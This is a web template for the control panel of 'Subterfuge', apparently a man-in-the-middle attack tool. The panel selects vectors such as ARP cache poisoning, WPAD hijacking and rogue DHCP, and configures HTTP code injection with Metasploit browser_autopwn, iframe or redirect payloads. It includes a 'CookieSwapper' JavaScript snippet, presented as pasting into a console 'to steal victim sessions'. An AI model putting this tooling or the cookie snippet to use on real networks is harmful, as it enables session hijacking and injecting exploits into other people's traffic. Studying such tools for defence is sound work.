{% extends "basic.tm" %}

{% block content %}

    <div id="dialog" class="window">
        <font color = "white">Initiating: </font><img src = "/static/images/loader.gif">
    </div>
    <div id="mask"></div>
	
	
<style>
#appbar
{
   //background:url('/static/images/panel.jpg') repeat-x;
   background-color: #d6e0e1;
   min-height: 50px; 
   width: auto;
   border-radius: 4px;
   margin-bottom: 20px;
	overflow: auto;
   -khtml-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -ms-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -o-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -moz-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   box-shadow: rgba(5, 5, 5, 5) 0 1px 2px; 

}
#inject_widget
{
   background:url('/static/images/panel.jpg') repeat-x;
	color: white;
   float: right;
   width: 300px;
	height: 50px;
   -khtml-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -ms-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -o-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -moz-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   box-shadow: rgba(5, 5, 5, 5) 0 1px 2px; 

}
	 #inject_text
	 {
		  padding-top: 10px;
		  padding-left: 10px;
	 }
	 #inject_menu
	 {
		  background: url('/static/images/menu.png');
		  position: absolute;
		  right: 30px;
		  top: 20px;
		  width: 35px;
		  height: 35px;
	 }
#inject_config
{
   float: right;
   width: 100%;
	height: 50px;
	border-top: solid 3px grey;
   overflow: auto;
   -khtml-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -ms-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -o-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -moz-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   -webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
   box-shadow: rgba(5, 5, 5, 5) 0 1px 2px; 
}
	 #inject_text
	 {
		  padding-top: 10px;
		  padding-left: 10px;
	 }
#status_widget
{
   float: right;
	padding-left: 20px;
	max-width: 500px;
   min-height: 50px;
}
#indicator_widget
{
	 background-color: black;
	 color: yellow;
	 float: left;
	 height: 50px;
	 width: 100%;
}
#indicator_text
{
	 padding-top: 10px;
	 padding-left: 10px;
	 font-family:Consolas, monospace;
}
#vector_widget
{
	 float: left;
	 height: 50px;
	 min-width: 100px;
}
#vector_text
{
	 padding-top: 10px;
	 padding-left: 10px;
}
#nettitle
{
   float: left;
   padding-top: 6px;
   margin-right: 5px;
}
#standard_button
{
		  background: url('/static/images/redbuttonbg.png') repeat-x;
        float: right;
        width: 120px;
        text-align: center;
        -khtml-border-radius: 4px 4px 4px 4px;
        -ms-border-radius: 4px;
        -o-border-radius: 4px;
        -moz-border-radius: 4px;
        -webkit-border-radius: 4px;
        border-radius: 5px 5px 5px 5px;
        -khtml-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
        -ms-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
        -o-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
        -moz-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
        -webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 2px;
        box-shadow: rgba(5, 5, 5, 5) 0 1px 2px;  
}

</style>

<script>




//var inMenu = document.getElementById("inject_menu");
//inMenu.onclick = toggleMenu;

	
function toggleMenu()
{
   if ($('#inject_config').is(':visible')) {
	 //Hide it
	 $('#inject_config').hide("slow");
	}
   if ($('#inject_config').is(':hidden')) {
	 //Show it
	 $('#inject_config').show("slow");
	}
}

$(document).ready(function()
{
   $('#inject_config').hide();
});

function showCookieSwapper()
{
  var popup = document.getElementById('cookieswapperpopup');

  if (popup.style.display == "none")
  {
		popup.style.display = 'block';
  }
  else
  {
		popup.style.display = 'none';
  }
}

</script>


<div id="cookieswapperpopup" style="display: none;">
	
	<h4>CookieSwapper -- Paste this into your browser's JavaScript Console to steal victim sessions.</h4> <a href = "#" onclick = "showCookieSwapper()" style = "color:blue">close</a>
	
<pre>
	
var cookieblob = 
"COOKIE DATA GOES HERE!!!"

var cookies = cookieblob.split(";");
for (var i = 0; i < cookies.length; i++)
{
   document.cookie=cookies[i].split("=")[0] + "=" + cookies[i].split("=")[1];
}
alert(document.cookie);

	
</pre>
</div>



<div id = "appbar">
   <!-- Active MITM Vectors -->
   <div id = "vector_widget">
      <div id = "vector_text">
         <h3>MITM Vector:
		      {% if vectors %}
		         {% for vector in vectors %}
	                {% if vector.active == "yes" or vector.active == "true" %}
	                   {{ vector.name }} 
                       {% if vector.name == "WPAD Hijacking" %}
                        <a href = "http://www.kinozoa.com/blog/wpad-hijacking/" target = "_blank"><img width = "15" src = "/static/images/help.png"></a>
                       {% endif %}
                       {% if vector.name == "ARP Cache Poisoning" %}
                        <a href = "http://www.kinozoa.com/blog/arp-poisoning/" target = "_blank"><img width = "15" src = "/static/images/help.png"></a>
                       {% endif %}
                       {% if vector.name == "Wireless AP Generator" %}
                        <a href = "http://www.kinozoa.com/blog/wap-generator/" target = "_blank"><img width = "15" src = "/static/images/help.png"></a>
                       {% endif %}
                       {% if vector.name == "Rogue DHCP" %}
                        <a href = "http://www.kinozoa.com/blog/rogue-dhcp/" target = "_blank"><img width = "15" src = "/static/images/help.png"></a>
                       {% endif %}
	                {% endif %}
		         {% endfor %}
		      {% endif %} 
         </h3>
      </div>
   </div>

   <!-- Injection Widget -->
   <div id = "inject_widget">
      <div id = "inject_text">
		{% if modules %}
		   {% for module in modules %}
		       {% if module.name == "httpcodeinjection" %}
		          {% if module.active == "yes" or module.active == "true" %}
		             Code Injection Enabled!<a href = "http://www.kinozoa.com/blog/code-injection/" target = "_blank">&nbsp;&nbsp;<img width = "15" src = "/static/images/help.png"></a>
		          {% else %}
		             Code Injection Disabled!<a href = "http://www.kinozoa.com/blog/code-injection/" target = "_blank">&nbsp;&nbsp;<img width = "15" src = "/static/images/help.png"></a>
		          {% endif %}
		       {% endif %}
		   {% endfor %}
		{% endif %} 
      </div>
      <a href = "#menu"><div id = "inject_menu" onclick = "toggleMenu()"></div></a>
   </div>

   <!-- Modules Enabled Panel -->
   <div id = "status_widget">

{% if modules %}
   {% for module in modules %}
<div id = "nettitle"><img height="35" width="35" src="/static/images/plugins/{{ module.name }}.png" title="{{ module.name }}">&nbsp;&nbsp;</div>
<div id = "nettitle">
      {% if module.name == "httpcodeinjection" %}
         <div id = "injectind">
      {% endif %}
         {% if module.active == "yes" or module.active == "true" %}
            <img width = "25" src = "/static/images/netview/green.png"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
         {% else %}
            <img width = "25" src = "/static/images/netview/red.png"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
         {% endif %}
      {% if module.name == "httpcodeinjection" %}
         </div>
      {% endif %}
   {% endfor %}
{% endif %}        
</div>

<!-- Injecton Ctrl Panel -->
<div id = "#inject_expand">
   <div id = "inject_config">
      <div id = "inject_text">


<form name = "httpinjectionform" id = "httpinjectionform" method = "post" action = "/config/httpinjection/">
<table>
<tr>
<td>Running:</td>
<input type = "hidden" name = "status" value = "no">
<td><input type = "checkbox" id = "status" name = "status" value = "yes"
		{% if modules %}
		   {% for module in modules %}
		       {% if module.name == "httpcodeinjection" %}
		          {% if module.active == "yes" %} checked = "checked"
					 {% endif %}
		       {% endif %}
		   {% endfor %}
		{% endif %}/></td>
<td>Exploit:</td>
               <td>
               <select name = "iexploit" id = "iexploit" class = "iexploit" onchange="exploit(this.value)">
                  <option value = "inject-ext-server">inject-ext-server</option>
                  <option value = "browser_autopwn">browser_autopwn</option>
                  <option value = "custom-inject">custom-injection</option>
               </select>
               </td>
<td>Payload:</td>
               <td>
               
               <select name = "payload" id = "payload">
                  <option value = "frameinjection">IFrame Injection</option>
                  <option value = "redir">Window Redirection</option>
                  <option value = "popup">Popup Window</option>
               </select>
               </td>
					
<td class = "custominjection">Custom Injection:</td>
<td class = "custominjection"><textarea rows = "2" name = "custominject" id = "custominject"></textarea></td>

<!-- startmsf -->
<input type = "hidden" id = "startmsf" name = "startmsf" value = "no">

<td class = "ip-port">IP:</td>
<td class = "ip-port"><input type = "text" name = "injectip" id = "injectip"></td> 
<td class = "ip-port">PORT:</td> 
<td class = "ip-port"><input type = "text" name = "injectport" id = "injectport"></td> 

<a href = "javascript: setconfig()" name = "apply"><div id = "standard_button" style = "margin-right: 20px; color: white;">Apply</div></a>


</tr>
</form>
</table>


      </div>
   </div>
</div>


   <div id = "indicator_widget">
      <div id = "indicator_text">
         Welcome to Subterfuge!
      </div>
   </div>

</div>



<script type="text/javascript">
               //Show/Hide Custom Injection
$(document).ready(function () {
                 $(".custominjection").hide();
                 
	               //select all the a tags named custominjection
                   $('a[name=custominjection]').click(function(e) {
	                   //Cancel the link behavior
	               e.preventDefault();
	                   //Get the A tag
	               var id = $(this).attr('href');

	               $(".custominjection").fadeIn("slow");
	               $(".vector").fadeOut("slow");

                  //Clear out hidden values
                  hideoptions();

                   }); 
               });

               //Vector Settings Control
               hideoptions();
               //browser_autopwn is default method
               document.getElementById('startmsf').value = "yes";

function hideoptions() {
   if (document.getElementById('iexploit').value != "inject-ext-server")
   {
      $(".ip-port").hide();
   }
  $(".custominjection").hide();
  document.getElementById('startmsf').value = "no";
}

function exploit(name) {
   hideoptions();

   //Allows the use of spaces in exploit names
   name = name.split(" ").join("");

   //Options Exploit Determination
   if (name == "browser_autopwn")
   {
      //Set START MSF
      document.getElementById('startmsf').value = "yes";
   }
   if (name == "inject-ext-server")
   {
      //Set Show ip-port
      $(".ip-port").fadeIn("slow");
   }
   if (name == "custom-inject")
   {
      //Set Show ip-port
      $(".custominjection").fadeIn("slow");
   }
}


function setconfig()
{
   initiating();
   $.post("/config/httpinjection/", {
         status:	     document.getElementById('status').checked,
         iexploit:	  document.getElementById('iexploit').value,
         payload:	     document.getElementById('payload').value,
         custominject: document.getElementById('custominject').value,
         startmsf:	  document.getElementById('startmsf').value,
         injectip:	  document.getElementById('injectip').value,
         injectport:  document.getElementById('injectport').value
   });
   $('#inject_config').hide("slow");
   if (document.getElementById('status').checked == true)
   {
      document.getElementById('injectind').innerHTML = '<img width = "25" src = "/static/images/netview/green.png"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>';
      document.getElementById('inject_text').innerHTML = 'Code Injection Enabled!';
   }
   else
   {
      document.getElementById('injectind').innerHTML = '<img width = "25" src = "/static/images/netview/red.png"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>';
      document.getElementById('inject_text').innerHTML = 'Code Injection Disabled!';
   }
}
</script>
        
<div id = "creds">

</div>


{% endblock %}
